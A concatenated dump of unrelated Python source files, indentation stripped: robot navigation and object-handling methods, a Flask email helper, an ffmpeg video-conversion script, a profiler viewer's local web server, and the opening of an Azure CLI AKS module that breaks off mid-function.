def _makeValidator(self, objects, blacklistNames, trajectors):
pathPrefix = os.path.join(os.path.dirname(__file__), "../meshes")
collisionManager = self.sim3D.space().makeCollisionManager()
for oname in objects.keys():
if oname in blacklistNames:
continue
mesh = self.sim3D.space().loadVolume(os.path.join(pathPrefix, objects[oname]["props"]["meshfile"]))
oC = objects[oname]
oCP = [oC["position"]["x"], oC["position"]["y"], oC["position"]["z"]]
oCQ = [oC["orientation"]["x"], oC["orientation"]["y"], oC["orientation"]["z"], oC["orientation"]["w"]]
rP, rQ = self.cerebellum.robotTransform()
invRobT = self.sim3D.space().invertTransform((rP, rQ))
oCP, oCQ = self.sim3D.space().transformTransform(invRobT, (oCP, oCQ))
collisionManager.add_object(oname, mesh, self.sim3D.space().poseFromTR(oCP, oCQ))
return Validator3D(collisionManager, trajectors, self.sim3D.space())
def _interpretDestSpec(self, trajectorName, destSpec):
enet = sg.explicateSchemas(destSpec, self.sim3D)
p = None
q = None
for s in enet.schemas():
if isinstance(s, st.ParameterizedSchema) and ("name" in s._parameters) and (trajectorName == s._parameters["name"]):
p = [0,0,0]
q = [0,0,0,1]
p[0] = s._parameters["tx"]
p[1] = s._parameters["ty"]
p[2] = s._parameters["tz"]
q[0] = s._parameters["rx"]
q[1] = s._parameters["ry"]
q[2] = s._parameters["rz"]
q[3] = s._parameters["rw"]
break
return p, q
def navigateToDestSpec(self, trajectorName, destSpec):
pos, q = self._interpretDestSpec(trajectorName, destSpec)
if not pos:
return False
pathPrefix = os.path.join(os.path.dirname(__file__), "../meshes")
pathAbe = os.path.join(pathPrefix, "abe.2d")
return self.navigateToObject({"name": "aux", "props": {"type": "aux", "meshfile": pathAbe}, "position": {"x": pos[0], "y": pos[1], "z": pos[2]}, "orientation": {"x": q[0], "y": q[1], "z": q[2], "w": q[3]}}, fwd_align=False)
def navigateToObject(self, objectD, fwd_align=True):
pathPrefix = os.path.join(os.path.dirname(__file__), "../meshes")
pathAbe = os.path.join(pathPrefix, "abe.2d")
abe = eo.MiscellaneousRigidObject(name="abe", object_type="agent", mesh=pathAbe)
objectName = ""
if isinstance(objectD,str):
objectName = str(objectD)
objects = self.cerebellum._retrieveObjects()
if not objects or objectD not in objects:
print("Either couldn't retrieve objects, or didn't find %s among them." % objectD)
return False
objectD = objects[objectD]
else:
objectName = objectD["name"]
pathRel = os.path.join(pathPrefix, "%s.2d" % objectD["props"]["meshfile"][:objectD["props"]["meshfile"].rfind(".")])
rel = eo.MiscellaneousRigidObject(name=objectName, object_type=objectD["props"]["type"], mesh=pathRel)
rel._parameters["tx"] = objectD["position"]["x"]
rel._parameters["ty"] = objectD["position"]["y"]
rel._parameters["yaw"] = geom.quaternion_to_euler([objectD["orientation"]["x"], objectD["orientation"]["y"], objectD["orientation"]["z"], objectD["orientation"]["w"]])[0]
rel._parameters["vx"] = 0.0
rel._parameters["vy"] = 0.0
rel._parameters["w"] = 0.0
fdRel = gp.ForwardDirection(obj=rel)
fdAbe = gp.ForwardDirection(obj=abe)
schemas = [(gpr.PointProximity(a=abe, b=rel),0.005), (gpr.AxisPointingTo(axis=fdAbe,point=rel),-math.pi/(4*math.log(0.1)))]
if fwd_align and fdRel.getAxis(self.sim2D):
schemas.append((gpr.AxisCounterAlignment(a=fdAbe, b=fdRel),0.005))
rpd = []
for k in self.cellMap._points.keys():
if self.cellMap._points[k].valid:
x = self.cellMap.pointId2EmbeddingCoordinates(k)
rpd.append([1.0, (x[0], x[1]), (x[2],)])
crPos = self.cerebellum.currentPosition("base")
rpd.append([1.0, (crPos["x"], crPos["y"]), (crPos["yaw"],)])
for s,strictness in schemas:
if "PointProximity" == s._type:
rpd = s.filterPD(rpd, [0,0,0,1], self.sim2D,strictness=strictness)
else:
rpd = s.filterPD(rpd, self.sim2D, strictness=strictness)
maxE = rpd[0]
for e in rpd[1:]:
if maxE[0] < e[0]:
maxE = e
return self.navigateToPosition(maxE[1][0], maxE[1][1], maxE[2][0])
def bringHandToPosition(self, hand, x, y, z, roll, pitch, yaw, objects={}):
if hand not in ["hands/left", "hands/right"]:
print("Only have a left and a right hand.")
return False
if not self.cellMap:
print("Don't have a navigation map: perhaps startOperation has not been called?")
return False
### Function assumes the target position to be given in the robot's local coordinate frame. Therefore, we will need to compute poses
### of world objects in this frame.
crPos = self.cerebellum.currentPosition("base")
crHandPos = self.cerebellum.currentPosition(hand)
finHandPos = {"x": x, "y": y, "z": z, "roll": roll, "pitch": pitch, "yaw": yaw}
pathPrefix = os.path.join(os.path.dirname(__file__), "../meshes")
handVolume = self.sim3D.space().loadVolume(os.path.join(pathPrefix, "Hand.stl"))
blacklistNames = []
trajectors = [[handVolume, [[0,0,0], [0,0,0,1]]]]#geom.euler_to_quaternion([yaw, pitch, roll])]]]
oIHName, oIHTr, oVolume = self.cerebellum.getObjectInHand(hand)
if oIHName:
blacklistNames.append(oIHName)
trajectors.append([oVolume, oIHTr])
validator = self._makeValidator(objects, blacklistNames, trajectors)
resolution = 0.2
xBack = {"hands/left": -0.2, "hands/right": -0.2}
yRight = {"hands/left": -0.6, "hands/right": -1.2}
zDown = {"hands/left": 0, "hands/right": 0}
cellMap = space3D.Grid3D(planes=round(2/resolution), lines=round(2.5/resolution), cols=round(3/resolution), resolution=resolution, xBack=xBack[hand], yRight=yRight[hand], zDown=zDown[hand], gridQ=(0, 0, 0, 1), validator=validator, velocity=1)
timedMap = space.TimedPointGraph(cellMap, cellMap.graphIngressPoints((crHandPos["x"], crHandPos["y"], crHandPos["z"])))
pidDBG = timedMap._pointGraph.embeddingCoordinates2PointId((x,y,z))
waypoints = timedMap.generatePath((x, y, z))
self.cerebellum.clearWaypoints(hand)
if waypoints:
waypoints = [cellMap.pointId2EmbeddingCoordinates(wp) for wp in waypoints]
for wp in waypoints:
self.cerebellum.pushWaypoint(hand, {"x": wp[0], "y": wp[1], "z": wp[2], "roll": roll, "pitch": pitch, "yaw": yaw})
self.cerebellum.pushWaypoint(hand, finHandPos)
print("On our way!")
return True
print("Target unreachable: either too far or no clear paths to it.")
return False
def pickObject(self, objectName):
parkY = {"hands/left": 0.4, "hands/right": -0.4}
hand = self.cerebellum.getFreeHand()
objects = self.cerebellum._retrieveObjects()
if not hand:
print("Both hands busy, can't pick up anything more")
return False
if objectName not in objects:
print("Either couldn't retrieve objects, or didn't find %s among them." % objectD)
return False
if not objects[objectName]["props"]["graspable"]:
print("Object not graspable.")
return False
rP, rQ = self.cerebellum.robotTransform()
o = objects[objectName]
oPW = [o["position"]["x"], o["position"]["y"], o["position"]["z"]]
oQW = [o["orientation"]["x"], o["orientation"]["y"], o["orientation"]["z"], o["orientation"]["w"]]
invRobT = self.sim3D.space().invertTransform((rP, rQ))
oP, oQ = self.sim3D.space().transformTransform(invRobT, (oPW, oQW))
pathPrefix = os.path.join(os.path.dirname(__file__), "../meshes")
volume = self.sim3D.space().loadVolume(os.path.join(pathPrefix, objects[objectName]["props"]["meshfile"]))
handVolume = self.sim3D.space().loadVolume(os.path.join(pathPrefix, "Hand.stl"))
validator = self._makeValidator(objects, [], [[handVolume, [[0,0,0], [0,0,0,1]]]])
radius = self.sim3D.space().boundaryBoxDiameter(self.sim3D.space().volumeBounds(volume))/2.0
if ('particle' in objects[objectName]["props"]) and (objects[objectName]["props"]["particle"]):
radius = radius + 0.1
candidates = []
for x in fibonacci_sphere(samples=40, only_positive_quadrant=True):
c = self.sim3D.space().vectorSum(oP, self.sim3D.space().vectorScale(radius, x))
if validator.isValid(c):
candidates.append(c)
minD = None
minC = None
for c in candidates:
d = self.sim3D.space().vectorNorm(self.sim3D.space().vectorDifference(c, [0, parkY[hand], 0.9]))
if (None == minD) or (minD > d):
minD = d
minC = c
if None == minC:
print("Huh. Couldn't seem to find any point to grasp from.")
return False
x, y, z = minC
def retractFn():
if self.bringHandToPosition(hand, 0, parkY[hand], 0.9, 0, 0, 0, objects=objects):
while True:
if self.cerebellum.haveNoMoreWaypoints(hand):
break
time.sleep(0.05)
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
def graspFn():
if self.bringHandToPosition(hand, x, y, z, 0, 0, 0, objects=objects):
while True:
if self.cerebellum.haveNoMoreWaypoints(hand):
break
time.sleep(0.05)
self.cerebellum.grabObject(hand, objectName, volume, self.sim3D.space(), [oPW, oQW], [rP, rQ])
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
tasks = self.cerebellum._tasks
tasks.pushTask(retractFn)
tasks.pushTask(graspFn)
return True
def placeObject(self, trajectorName, destinationSpec, hand):
parkY = {"hands/left": 0.4, "hands/right": -0.4}
objects = self.cerebellum._retrieveObjects()
if (hand not in self.cerebellum._handItems) or (trajectorName != self.cerebellum._handItems[hand]):
print("Hand/Object Error: either the hand is not recognized, or it holds another object.")
return False
p, q = self._interpretDestSpec(trajectorName, destinationSpec)
if not p:
print("Could not interpret destspec")
return False
hHP, hHQ = self.sim3D.space().transformTransform((p, q), self.sim3D.space().invertTransform(self.cerebellum._objectInHandTransforms[hand]))
rP, rQ = self.cerebellum.robotTransform()
hP, hQ = self.sim3D.space().transformTransform(self.sim3D.space().invertTransform((rP, rQ)), (hHP, hHQ))
x, y, z = hP
yaw, pitch, roll = geom.quaternion_to_euler(hQ)
def retractFn():
if self.bringHandToPosition(hand, 0, parkY[hand], 0.9, 0, 0, 0, objects=objects):
while True:
if self.cerebellum.haveNoMoreWaypoints(hand):
break
time.sleep(0.05)
print("DONE RETRACT")
self._lastRequestedAction = True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
def releaseFn():
if self.bringHandToPosition(hand, x, y, z, roll, pitch, yaw, objects=objects):
while True:
if self.cerebellum.haveNoMoreWaypoints(hand):
break
time.sleep(0.05)
self.cerebellum.releaseObject(hand)
print("DONE RELEASE")
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
tasks = self.cerebellum._tasks
tasks.pushTask(retractFn)
tasks.pushTask(releaseFn)
return True
def carryObject(self, trajectorName, destinationSpec):
tasks = self.cerebellum._tasks
tasks.clearTasks()
def navFn():
if self.navigateToObject(trajectorName,fwd_align=False):
while True:
if self.cerebellum.haveNoMoreWaypoints("base"):
break
time.sleep(0.05)
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
def graspFn():
hand = self.pickObject(trajectorName)
if hand:
while True:
if self.cerebellum.haveNoMoreWaypoints(hand):
break
time.sleep(0.05)
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
def nav2Fn():
if self.navigateToDestSpec(trajectorName, destinationSpec):
while True:
if self.cerebellum.haveNoMoreWaypoints("base"):
break
time.sleep(0.05)
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
def placeFn():
hand = self.cerebellum.getItemHand(trajectorName)
if hand and self.placeObject(trajectorName, destinationSpec, hand):
while True:
if self.cerebellum.haveNoMoreWaypoints(hand):
break
time.sleep(0.05)
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
tasks.appendTask(navFn)
tasks.appendTask(graspFn)
tasks.appendTask(nav2Fn)
tasks.appendTask(placeFn)
with tasks._lock:
if None == tasks._currentTask:
tasks.needsSwitch = True
return True
##### Delete the fns below
def _toWeightedExtension(self, cellMap, location):
retq = {"operation": "weighted-extension", "spec": {}}
if isinstance(location, tuple):
retq["spec"] = {location: 1.0}
elif isinstance(location, list):
retq["spec"] = {l: 1.0 for l in location}
elif isinstance(location, str):
retq["spec"] = self.interpretLocation(cellMap, location)["spec"]
elif isinstance(location, dict):
if "extension" == location["operation"]:
retq["spec"] = {l: 1.0 for l in location["spec"]}
elif "weighted-extension" == location["operation"]:
retq["spec"] = location["spec"]
else:
retq = self.interpretLocation(cellMap, location)
return retq
def interpretLocation(self, cellMap, location):
if isinstance(location, tuple) or isinstance(location, list):
return location
if isinstance(location, str):
objects = self.cerebellum._retrieveObjects()
if location in objects:
return {"operation": "weighted-extension", "spec": {(objects[location]["position"]["x"], objects[location]["position"]["y"], yawId*math.pi/4): 1.0 for yawId in range(8)}}
elif isinstance(location, dict):
if "extension" == location["operation"]:
return location["spec"]
elif "weighted-extension" == location["operation"]:
retq = []
cMax = None
for p, w in location["spec"].items():
if (None == cMax) or (cMax < w):
cMax = w
retq = [p]
elif cMax == w:
retq.append(p)
return retq
elif "near-to" == location["operation"]:
location = self._toWeightedExtension(cellMap, location["spec"])
retq = {"operation": "weighted-extension", "spec": {}}
for g, v in cellMap._points.items():
if v.valid:
gE = tuple(cellMap.pointId2EmbeddingCoordinates(g))
retq["spec"][gE] = 0
for p, w in location["spec"].items():
dx = (p[0] - gE[0])
dy = (p[1] - gE[1])
d = math.sqrt(dx*dx + dy*dy)
if 0.01 < d:
tYaw = math.atan2(dy, dx)
dyaw = 0.1*geom.angle_diff(tYaw, gE[2])
d = math.sqrt(dx*dx + dy*dy + dyaw*dyaw)
retq["spec"][gE] = max(retq["spec"][gE], w*(1.0/(1.0 + d*d)))
return retq
elif "conjunction" == location["operation"]:
locations = [self._toWeightedExtension(cellMap, l) for l in location["spec"]]
retq = {"operation": "weighted-extension", "spec": {}}
if locations:
for p, w in locations[0]["spec"].items():
if 0 == w:
continue
for loc in locations[1:]:
if p in loc["spec"]:
w = min(w, loc["spec"][p])
else:
w = 0
break
if 0 < w:
retq["spec"][p] = w
return retq
elif "disjunction" == location["operation"]:
locations = [self._toWeightedExtension(cellMap, l) for l in location["spec"]]
retq = {"operation": "weighted-extension", "spec": {}}
for l in locations:
for p, w in l["spec"].items():
if p not in retq["spec"]:
retq["spec"][p] = 0
retq["spec"][p] = max(retq["spec"][p], w)
return retq
return None
|
email.py
|
from threading import Thread
from flask import current_app
from flask_mail import Message
from app import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body, attachments=None, sync=False):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
if attachments:
for attachment in attachments:
msg.attach(*attachment)
if sync:
mail.send(msg)
else:
Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()
|
converter.py
|
import ffmpeg
import subprocess
import os
from enum import Enum
from threading import Thread
_MKV_FILE_PATH_FORMAT = 'D:/1-mkv/{:02d}.mkv'
_SUB_FILE_PATH_FORMAT = 'C\\:\\\\1-sub\\\\{:02d}.ass'
_CONVERTING_FOLDER_PATH_FORMAT = 'C:/2-converting/{:02d}/'
_CONVERTING_VIDEO_NAME_FORMAT = 'video.avc'
_CONVERTING_AUDIO_NAME_FORMAT = 'audio.flac'
_CONVERTED_AUDIO_NAME_FORMAT = 'audio.aac'
_OUTPUT_FILE_PATH_FORMAT = 'C:/3-output/{:02d}.mp4'
class ItemStatus(Enum):
Waiting = 1
Processing = 2
Processed = 3
class Item(object):
def __init__(self, index):
self.index = index
self.extraction = ItemStatus.Waiting
self.extraction_thread = None
self.audio_conversion = ItemStatus.Waiting
self.audio_conversion_thread = None
self.merging = ItemStatus.Waiting
self.merging_thread = None
pass
def __str__(self):
return "[index={}, extraction={}, audio={}, merging={}]".format(self.index,
self.extraction,
self.audio_conversion,
self.merging)
def __repr__(self):
return self.__str__()
def extract_from_mkv(index):
print("{} - EXTRACTION...".format(index))
mkv_file_path = _MKV_FILE_PATH_FORMAT.format(index)
converting_folder = _CONVERTING_FOLDER_PATH_FORMAT.format(index)
video_path = converting_folder + _CONVERTING_VIDEO_NAME_FORMAT
audio_path = converting_folder + _CONVERTING_AUDIO_NAME_FORMAT
cmd = ['mkvextract',
mkv_file_path,
'tracks',
'0:{}'.format(video_path),
'1:{}'.format(audio_path)]
subprocess.run(cmd, stdout=open(os.devnull, 'wb'))
pass
def convert_audio(index):
print("{} - EXTRACTION AUDIO".format(index))
converting_folder = _CONVERTING_FOLDER_PATH_FORMAT.format(index)
input_audio_path = converting_folder + _CONVERTING_AUDIO_NAME_FORMAT
output_audio_path = converting_folder + _CONVERTED_AUDIO_NAME_FORMAT
process = (
ffmpeg
.input(input_audio_path)
.output(output_audio_path, acodec='aac')
)
run_process(process)
pass
def merge_video(index):
print("{} - EXTRACTION MERGE...".format(index))
converting_folder = _CONVERTING_FOLDER_PATH_FORMAT.format(index)
input_video_path = converting_folder + _CONVERTING_VIDEO_NAME_FORMAT
input_audio_path = converting_folder + _CONVERTING_AUDIO_NAME_FORMAT
input_sub_path = _SUB_FILE_PATH_FORMAT.format(index)
output_file_path = _OUTPUT_FILE_PATH_FORMAT.format(index)
process = (
ffmpeg
.input(input_video_path,
i=input_audio_path,
vsync=0, hwaccel='cuvid',
vcodec='h264_cuvid')
.output(output_file_path,
acodec='aac', vcodec='h264_nvenc',
crf=10,
vf="ass='{}'".format(input_sub_path))
)
run_process(process)
def run_process(process):
process.run(quiet=True, overwrite_output=True)
# process.run(overwrite_output=True)
pass
def extraction_runner(item_list):
__MAX_NUM_THREAD = 3
num_finished_items = 0
processing_list = []
while num_finished_items < len(item_list):
# Clear completed threads
for item in processing_list:
if not item.extraction_thread.is_alive():
# Mark complete
item.extraction = ItemStatus.Processed
# Remove item from current list
processing_list.remove(item)
# Increase count
num_finished_items += 1
print("{} - EXTRACTION ...".format(item.index))
pass
pass
# Add new threads
for item in item_list:
# Stop adding new thread if reaches __MAX_NUM_THREAD
if len(processing_list) >= __MAX_NUM_THREAD:
break
# Add new thread in order
if item.extraction == ItemStatus.Waiting:
# Create new thread from item
thread = Thread(target=extract_from_mkv, args=[item.index])
thread.start()
# Add thread
item.extraction_thread = thread
# Make item as processing
item.extraction = ItemStatus.Processing
# Add item to processing list
processing_list.append(item)
pass
pass
print("ALL - EXTRACTION finished")
pass
def convert_audio_runner(item_list):
num_finished_items = 0
current_item = item_list[0]
# New thread
thread = Thread(target=convert_audio, args=[current_item.index])
thread.start()
# Add thread
current_item.audio_conversion_thread = thread
# Mark processing
current_item.audio_conversion = ItemStatus.Processing
while num_finished_items < len(item_list):
if not current_item.audio_conversion_thread.is_alive():
# Mark complete
current_item.audio_conversion = ItemStatus.Processed
print("{} - EXTRACTION Audio ...".format(current_item.index))
# Remove item from current
current_item = None
# Increase count
num_finished_items += 1
# Start new
for item in item_list:
if item.extraction == ItemStatus.Processed and item.audio_conversion == ItemStatus.Waiting:
# New thread
thread = Thread(target=convert_audio, args=[item.index])
thread.start()
# Add thread
item.audio_conversion_thread = thread
# Mark processing
item.audio_conversion = ItemStatus.Processing
# Set to current
current_item = item
# Break look up
break
pass
pass
pass
print("ALL - AUDIO finished")
pass
def main():
start_index = 1
end_index = 48
# items = [Item(i) for i in range(start_index, end_index)]
# print(items)
# extraction_thread = Thread(target=extraction_runner, args=[items])
# extraction_thread.start()
# audio_conversion_thread = Thread(target=convert_audio_runner, args=[items])
# audio_conversion_thread.start()
#
# while extraction_thread.is_alive() or audio_conversion_thread.is_alive():
# pass
# pass
for i in range(start_index, end_index):
extract_from_mkv(i)
merge_video(i)
pass
pass
if __name__ == '__main__':
main()
pass
|
main.py
|
import json
import mimetypes
import os
import pstats
import string
import threading
import webbrowser
from http.server import BaseHTTPRequestHandler, HTTPServer
from .__about__ import __version__
from .module_groups import built_in, built_in_deprecated
try:
from html import escape
except ImportError:
from cgi import escape
class TunaError(Exception):
pass
def read(filename):
_, ext = os.path.splitext(filename)
try:
return read_import_profile(filename)
except (TunaError, StopIteration):
pass
# runtime profile
return read_runtime_profile(filename)
def read_runtime_profile(prof_filename):
stats = pstats.Stats(prof_filename)
# One way of picking the root nodes would be to loop over stats.stats.items() and
# check which doesn't have parents. This, however, doesn't work if there are loops
# in the graph which happens, for example, if exec() is called somewhere in the
# program. For this reason, find all nodes without parents and simply hardcode
# `<built-in method builtins.exec>`.
roots = set([])
for item in stats.stats.items():
key, value = item
if value[4] == {}:
roots.add(key)
default_root = ("~", 0, "<built-in method builtins.exec>")
if default_root in stats.stats:
roots.add(default_root)
roots = list(roots)
# Collect children
children = {key: [] for key in stats.stats.keys()}
for key, value in stats.stats.items():
_, _, _, _, parents = value
for parent in parents:
children[parent].append(key)
def populate(key, parent):
if parent is None:
_, _, selftime, cumtime, parent_times = stats.stats[key]
parent_times = []
else:
_, _, _, _, parent_times = stats.stats[key]
_, _, selftime, cumtime = parent_times[parent]
# Convert the tuple key into a string
name = "{}::{}::{}".format(*key)
if len(parent_times) <= 1:
# Handle children
# merge dictionaries
c = [populate(child, key) for child in children[key]]
c.append({"name": name + "::self", "color": 0, "value": selftime})
out = {"name": name, "color": 0, "children": c}
else:
out = {"name": name, "color": 0, "value": cumtime}
return out
data = {
"name": "root",
"color": 0,
"children": [populate(root, None) for root in roots],
}
return data
def _shelf(lst, k):
reference_level = lst[k][1]
out = []
while k < len(lst):
name, level, self_time = lst[k]
if level == reference_level:
out.append({"name": name, "value": self_time * 1.0e-6})
k += 1
elif level < reference_level:
return out, k
else:
assert level == reference_level + 1
out[-1]["children"], k = _shelf(lst, k)
return out, k
def _add_color(lst, ancestor_is_built_in):
for item in lst:
module_name = item["name"].split(".")[0]
is_built_in = (
ancestor_is_built_in
or module_name in built_in
or module_name in built_in_deprecated
)
color = 1 if is_built_in else 0
if module_name in built_in_deprecated:
color = 2
item["color"] = color
if "children" in item:
_add_color(item["children"], is_built_in)
return
def read_import_profile(filename):
# The import profile is of the form
# ```
# import time: self [us] | cumulative | imported package
# import time: 378 | 378 | zipimport
# import time: 1807 | 1807 | _frozen_importlib_external
# import time: 241 | 241 | _codecs
# import time: 6743 | 6984 | codecs
# import time: 1601 | 1601 | encodings.aliases
# import time: 11988 | 20571 | encodings
# import time: 700 | 700 | encodings.utf_8
# import time: 535 | 535 | _signal
# import time: 1159 | 1159 | encodings.latin_1
# [...]
# ```
# The indentation in the last column signals parent-child relationships. In the
# above example, `encodings` is parent to `encodings.aliases` and `codecs` which in
# turn is parent to `_codecs`.
entries = []
with open(filename, "r") as f:
# filtered iterator over lines prefixed with "import time: "
import_lines = (
line[len("import time: ") :].rstrip()
for line in f
if line.startswith("import time: ")
)
try:
line = next(import_lines)
except UnicodeError:
raise TunaError()
for line in import_lines:
if line == "self [us] | cumulative | imported package":
continue
items = line.split(" | ")
assert len(items) == 3
self_time = int(items[0])
last = items[2]
name = last.lstrip()
num_leading_spaces = len(last) - len(name)
assert num_leading_spaces % 2 == 0
indentation_level = num_leading_spaces // 2
entries.append((name, indentation_level, self_time))
lst, k = _shelf(entries[::-1], 0)
assert k == len(entries)
# go through the tree and add "color"
_add_color(lst, False)
return {"name": "main", "color": 0, "children": lst}
def render(data):
this_dir = os.path.dirname(__file__)
with open(os.path.join(this_dir, "web", "index.html")) as _file:
template = string.Template(_file.read())
return template.substitute(
data=escape(json.dumps(data).replace("</", "<\\/")), version=escape(__version__)
)
def start_server(prof_filename, start_browser, port):
data = read(prof_filename)
class StaticServer(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
if self.path == "/":
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(render(data).encode("utf-8"))
else:
this_dir = os.path.dirname(__file__)
# Remove the leading slash in self.path
filepath = os.path.join(this_dir, "web", self.path[1:])
mimetype, _ = mimetypes.guess_type(filepath)
self.send_header("Content-type", mimetype)
self.end_headers()
with open(filepath, "rb") as fh:
content = fh.read()
self.wfile.write(content)
return
httpd = HTTPServer(("", port), StaticServer)
if start_browser:
address = "http://localhost:{}".format(port)
threading.Thread(target=lambda: webbrowser.open_new_tab(address)).start()
print("Starting httpd on port {}".format(port))
httpd.serve_forever()
return
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
from math import isnan
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceLinuxProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterWindowsProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceNetworkProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterServicePrincipalProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceSshConfiguration
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceSshPublicKey
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedCluster
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAADProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAddonProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAgentPoolProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import AgentPool
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceStorageProfileTypes
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterIdentity
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAPIServerAccessProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterSKU
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_PREFIX, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_SHARED, CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
